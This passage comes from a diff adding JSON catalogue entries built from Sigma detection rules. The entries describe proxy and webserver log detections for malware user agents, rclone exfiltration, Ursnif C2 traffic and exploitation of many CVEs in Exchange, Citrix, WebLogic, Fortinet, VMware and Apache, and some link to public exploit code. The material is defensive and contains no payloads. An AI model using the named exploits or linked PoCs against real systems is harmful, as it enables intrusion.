"https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_malware.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", + "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", + "value": "Rclone Activity via Proxy", + "meta": { + "refs": [ + "https://rclone.org/", + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2022/10/18", + "filename": "proxy_ua_rclone.yml", + "author": "Janantha Marasinghe", + "level": "medium", + "falsepositive": [ + "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious malformed user agent strings in proxy logs", + "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", + "value": "Suspicious User Agent", + "meta": { + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_susp.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", + "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", + "value": "Suspicious Base64 User Agent", + "meta": { + "refs": [ + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/07/08", + "filename": "proxy_ua_susp_base64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Ursnif C2 traffic.", + "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", + "value": "Ursnif Malware C2 URL Pattern", + "meta": { + "refs": [ + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1204.002", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/12/19", + "filename": "proxy_ursnif_malware_c2_url.yml", + "author": "Thomas Patzke", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects download of Ursnif malware done by dropper documents.", + "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", + "value": "Ursnif Malware Download URL Pattern", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" + ], + "tags": "No established tags", + "creation_date": "2019/12/19", + "filename": "proxy_ursnif_malware_download_url.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault", + "meta": { + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ], + "creation_date": "2017/02/28", + "filename": "web_apache_segfault.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error", + "meta": { + "refs": [ + "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" + ], + "tags": "No established tags", + "creation_date": "2019/01/22", + "filename": "web_apache_threading_error.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", + "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", + "value": "CVE-2010-5278 Exploitation Attempt", + "meta": { + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/25", + "filename": "web_cve_2010_5278_exploitation_attempt.yml", + "author": "Subhash Popuri (@pbssubhash)", + "level": "critical", + "falsepositive": [ + "Scanning from Nuclei", + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", + "value": "Rejetto HTTP File Server RCE", + "meta": { + "refs": [ + "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", + "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.t1505.003", + "cve.2014.6287" + ], + "creation_date": "2022/07/19", + "filename": "web_cve_2014_6287_hfs_rce.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", + "value": "Fortinet CVE-2018-13379 Exploitation", + "meta": { + "refs": [ + "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/12/08", + "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "value": "Oracle WebLogic Exploit", + "meta": { + "refs": [ + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.t1505.003", + "cve.2018.2894" + ], + "creation_date": "2018/07/22", + "filename": "web_cve_2018_2894_weblogic_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", + "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", + "value": "Pulse Secure Attack CVE-2019-11510", + "meta": { + "refs": [ + "https://www.exploit-db.com/exploits/47297", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2019/11/18", + "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", + "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", + "value": "Citrix Netscaler Attack CVE-2019-19781", + "meta": { + "refs": [ + "https://support.citrix.com/article/CTX267679", + "https://support.citrix.com/article/CTX267027", + "https://isc.sans.edu/diary/25686", + "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/01/02", + "filename": "web_cve_2019_19781_citrix_exploit.yml", + "author": "Arnim Rupp, Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", + "value": "Confluence Exploitation CVE-2019-3398", + "meta": { + "refs": [ + "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/05/26", + "filename": "web_cve_2019_3398_confluence.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2020-0688 Exploitation attempts", + "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", + "value": "CVE-2020-0688 Exploitation Attempt", + "meta": { + "refs": [ + "https://github.com/Ridter/cve-2020-0688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/02/27", + "filename": "web_cve_2020_0688_exchange_exploit.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", + "value": "CVE-2020-0688 Exchange Exploitation via Web Log", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/02/29", + "filename": "web_cve_2020_0688_msexchange.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", + "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", + "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass", + "meta": { + "refs": [ + "https://kb.cert.org/vuls/id/843464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/12/27", + "filename": "web_cve_2020_10148_solarwinds_exploit.yml", + "author": "Bhabesh Raj, Tim Shelton", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts on WebLogic servers", + "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", + "value": "Oracle WebLogic Exploit CVE-2020-14882", + "meta": { + "refs": [ + "https://isc.sans.edu/diary/26734", + "https://twitter.com/jas502n/status/1321416053050667009?s=20", + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.14882" + ], + "creation_date": "2020/11/02", + "filename": "web_cve_2020_14882_weblogic_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", + "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", + "value": "TerraMaster TOS CVE-2020-28188", + "meta": { + "refs": [ + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.28188" + ], + "creation_date": "2021/01/25", + "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", + "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", + "value": "Cisco ASA FTD Exploit CVE-2020-3452", + "meta": { + "refs": [ + "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.3452" + ], + "creation_date": "2021/01/07", + "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", + "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", + "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt", + "meta": { + "refs": [ + "https://support.f5.com/csp/article/K52145254", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/07/05", + "filename": "web_cve_2020_5902_f5_bigip.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", + "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", + "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195", + "meta": { + "refs": [ + "https://support.citrix.com/article/CTX276688", + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/07/10", + "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", + "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", + "value": "Arcadyan Router Exploitations", + "meta": { + "refs": [ + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.20090", + "cve.2021.20091" + ], + "creation_date": "2021/08/24", + "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", + "uuid": "687f6504-7f44-4549-91fc-f07bab065821", + "value": "Oracle WebLogic Exploit CVE-2021-2109", + "meta": { + "refs": [ + "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2021.2109" + ], + "creation_date": "2021/01/20", + "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", + "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", + "value": "CVE-2021-21972 VSphere Exploitation", + "meta": { + "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", + "https://f5.pm/go-59627.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/02/24", + "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "OVA uploads to your VSphere appliance" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", + "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", + "value": "CVE-2021-21978 Exploitation Attempt", + "meta": { + "refs": [ + "https://twitter.com/wugeej/status/1369476795255320580", + "https://paper.seebug.org/1495/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978" + ], + "creation_date": "2020/03/10", + "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", + "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", + "value": "VMware vCenter Server File Upload CVE-2021-22005", + "meta": { + "refs": [ + "https://kb.vmware.com/s/article/85717", + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/09/24", + "filename": "web_cve_2021_22005_vmware_file_upload.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Vulnerability Scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", + "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", + "value": "Fortinet CVE-2021-22123 Exploitation", + "meta": { + "refs": [ + "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/19", + "filename": "web_cve_2021_22123_fortinet_exploit.yml", + "author": "Bhabesh Raj, Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", + "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", + "value": "Pulse Connect Secure RCE Attack CVE-2021-22893", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/06/29", + "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Vulnerability Scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", + "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", + "value": "Exploitation of CVE-2021-26814 in Wazuh", + "meta": { + "refs": [ + "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978", + "cve.2021.26814" + ], + "creation_date": "2021/05/22", + "filename": "web_cve_2021_26814_wzuh_rce.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", + "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", + "value": "ProxyLogon Reset Virtual Directories Based On IIS Log", + "meta": { + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + ], + "tags": "No established tags", + "creation_date": "2021/08/10", + "filename": "web_cve_2021_26858_iis_rce.yml", + "author": "frack113", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "webserver", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", + "value": "Exchange Exploitation CVE-2021-28480", + "meta": { + "refs": [ + "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/05/14", + "filename": "web_cve_2021_28480_exchange_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", + "value": "CVE-2021-33766 Exchange ProxyToken Exploitation", + "meta": { + "refs": [ + "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/30", + "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", + "author": "Florian Roth, Max Altgelt, Christian Burkard", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", + "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", + "value": "ADSelfService Exploitation", + "meta": { + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" + ], + "tags": "No established tags", + "creation_date": "2021/09/20", + "filename": "web_cve_2021_40539_adselfservice.yml", + "author": "Tobias Michalski, Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", + "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", + "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit", + "meta": { + "refs": [ + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/09/10", + "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", + "author": "Sittikorn S, Nuttakorn Tungpoonsup", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", + "value": "CVE-2021-41773 Exploitation Attempt", + "meta": { + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://twitter.com/ptswarm/status/1445376079548624899", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/10/05", + "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "author": "daffainfo, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", + "value": "Sitecore Pre-Auth RCE CVE-2021-42237", + "meta": { + "refs": [ + "https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/11/17", + "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", + "author": "Florian Roth", + 